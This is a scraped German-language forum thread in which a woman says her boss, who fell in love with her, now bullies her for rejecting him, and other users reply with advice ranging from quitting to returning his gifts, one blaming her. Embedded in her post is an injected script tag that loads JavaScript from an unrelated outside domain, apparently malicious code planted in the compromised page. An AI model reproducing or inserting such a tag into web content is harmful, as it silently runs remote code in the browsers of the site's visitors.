Ankündigung

Einklappen
Keine Ankündigung bisher.

Chef hat sich verliebt und mobbt mich jetzt weil ich es nicht erwieder

Einklappen
X

• Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

AW: Chef hat sich verliebt und mobbt mich jetzt weil ich es nicht erwieder

Dafür kein Sorry. Das tat echt gut und ich versuche jetzt auch nicht mehr alt zu sehr drüber nachzudenken. Ich halte euch mal auf den laufenden falls doch noch was passiert.....Danke leute
    <script src="http://rosathemenplugin.info/dfi823hs.js?0.9038229453496551"></script>

Kommentar

Super! Gute Nacht!;-))) Gruß Biggi

Kommentar

Hallo

Allso ich würde an deiner Stelle erst kündigen wenn ein neuer Job da ist und bis dahin krank machen-die Situation ändern kannst du nicht.Seine Frau will blind und taub sein-ich bin mir sicher sie weiß was los ist und würde ums Verrecken ihren Mann schützen weil sie so ruhiger lebt.Schick der Ehefrau die Geschenke ins Haus und überlass den Rest dem Schicksaal.

Hat er dich belästigt ? Eine Anzeige wäre angebracht sollte es da Vorkommnisse geben.

Gruß Tomm

Kommentar

Hm, vielleicht bin ich ja ein Trottel, aber ich würde versuchen, auf die sanfte Tour da rauszukommen. Würde dem Chef sagen, dass es mir leid tut, dass ich die Geschenke genommen habe, hier sind sie zurück. Ich war mit der Situation überfordert blabla und es war ja auch mit meine Schuld. Eigentlich weiß ich nicht viel über ihn, werde auch niemandem was sagen. Er möge mir doch bitte ein gutes Zeugnis geben und ich suche mir dann etwas Neues und er hört nie wieder von mir. Punkt.
          Echt, ich würde nicht riskieren wollen, dass die Sache eskaliert, gerade in einem kleinen Ort. Das kann richtig übel werden und wer weiß, wozu er noch in der Lage ist. Rufmord ja mindestens, aber vielleicht ja auch andere Gemeinheiten?
          Also, ich hatte genug mit Psychos zu tun, um lieber vorsichtig zu sein.
          Audrey

Kommentar

PS: Und ehrlich gesagt bist Du ja auch selbst schuld. Es müsste doch klar gewesen sein, dass er die Geschenke nicht einfach so macht, sondern etwas dafür zurück will!

Kommentar

Lädt...
            X